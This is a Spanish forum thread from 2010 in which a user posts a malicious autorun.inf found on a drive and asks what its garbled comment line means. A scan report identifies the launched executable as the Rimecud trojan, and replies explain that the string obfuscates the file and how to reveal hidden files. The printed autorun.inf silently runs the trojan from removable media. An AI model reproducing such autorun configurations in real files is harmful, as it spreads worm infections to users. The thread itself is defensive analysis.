elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderador: fary)
| | |-+  extraño autorun
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: extraño autorun  (Leído 5,246 veces)
morty2

Desconectado Desconectado

Mensajes: 33



Ver Perfil
extraño autorun
« en: 31 Diciembre 2010, 19:12 pm »

hola amigos, intentaron infectarme con esto, que les parece??




[autorun]
shellexecute=nocasmilimoj\\\nenijerano.exe
action=Open folder to see files using Windows Explorer
USEAUTOPLAY=1
#djkds£êÑÊÀ×ËÎÄÊÀÑÎ×ËäêôŒËÎ×ô¼ŒŠ×ô
open=nocasmilimoj\\\nenijerano.exe
icon=shell32.dll,4
shell\\\Install\\\command=nocasmilimoj\\\nenijerano.exe
shell\\\open\\\command=nocasmilimoj\\\nenijerano.exe
shell\\\explore\\\command=nocasmilimoj\\\nenijerano.exe
Shell\\\open\\\command=nocasmilimoj\\\nenijerano.exe


habia visto bastantes autorun antes pero nunca ninguno con nada parecido a

#djkds£êÑÊÀ×ËÎÄÊÀÑÎ×ËäêôŒËÎ×ô¼ŒŠ×ô

alguien que sepa me lo podria explicar??
gracias de antemano
En línea

morty2

Desconectado Desconectado

Mensajes: 33



Ver Perfil
Re: extraño autorun
« Respuesta #1 en: 31 Diciembre 2010, 19:55 pm »

encontré el archivo y me da ésto.....


File Info

Report date: 2010-12-31 19:53:34 (GMT 1)
File name: nenijerano-exe
File size: 206336 bytes
MD5 Hash: 60aedbc78bfc3285169cc78d73a591aa
SHA1 Hash: a0f2c2bd8f3594726d0ebb0c42c71df080541965
Detection rate: 5 on 16 (31%)
Status: INFECTED

Detections

a-squared - Trojan.Win32.Rimecud!IK
Avast -
AVG -
Avira AntiVir -
BitDefender - Gen:Variant.Kazy.6906
ClamAV -
Comodo -
Dr.Web -
F-PROT6 -
Ikarus T3 - Trojan.Win32.Rimecud
Kaspersky -
NOD32 -
Panda - Suspicious file
TrendMicro -
VBA32 - BScope.Trojan.MTA.0904
VirusBuster -

Scan report generated by
NoVirusThanks.org
En línea

[Zero]
Wiki

Desconectado Desconectado

Mensajes: 1.082


CALL DWORD PTR DS:[0]


Ver Perfil WWW
Re: extraño autorun
« Respuesta #2 en: 31 Diciembre 2010, 20:07 pm »

La cadena rara es para ofuscar, eso vuelve el autorun menos detectable. Lo usan muchos gusanos:
Código:
http://www.infospyware.eu/conficker-autorun.html

Saludos
En línea


“El Hombre, en su orgullo, creó a Dios a su imagen y semejanza.”
Nietzsche
morty2

Desconectado Desconectado

Mensajes: 33



Ver Perfil
Re: extraño autorun
« Respuesta #3 en: 31 Diciembre 2010, 20:40 pm »

gracias amigo.

ahora el problema es que el autorun anda por ahi y no lo encuentro!!
En línea

skapunky
Electronik Engineer &
Colaborador
***
Desconectado Desconectado

Mensajes: 3.667


www.killtrojan.net


Ver Perfil WWW
Re: extraño autorun
« Respuesta #4 en: 1 Enero 2011, 02:19 am »

Debe estar oculto, mira en opciones y pon que los archivos ocultos se muestren, si no sabes como hacerlo aquí te dejo una pequeña guia:

Guia para ver archivos ocultos
En línea

Killtrojan Syslog v1.44: ENTRAR
Karcrack


Desconectado Desconectado

Mensajes: 2.416


Se siente observado ¬¬'


Ver Perfil
Re: extraño autorun
« Respuesta #5 en: 1 Enero 2011, 14:23 pm »

Ver archivos ocultos en todos los Windows
En línea

morty2

Desconectado Desconectado

Mensajes: 33



Ver Perfil
Re: extraño autorun
« Respuesta #6 en: 1 Enero 2011, 20:30 pm »

Esta ocultado con el comando attrib de msdos, por eso no se veía ni aun poniendo que se muestren los archivos ocultos. Eso lo e solucionado, incluso había creado claves de registro el cabr..., jeje..
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Autorun Eater 2.5: Detecta y elimina archivos Autorun.inf peligrosos con ....
Noticias
wolfbcn 0 4,342 Último mensaje 11 Mayo 2010, 20:57 pm
por wolfbcn
Autorun en DVD
Multimedia
duna50 5 5,243 Último mensaje 20 Agosto 2010, 10:19 am
por Songoku
Autorun
Dudas Generales
all_vlc 4 3,539 Último mensaje 28 Septiembre 2010, 16:38 pm
por 1mpuls0
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines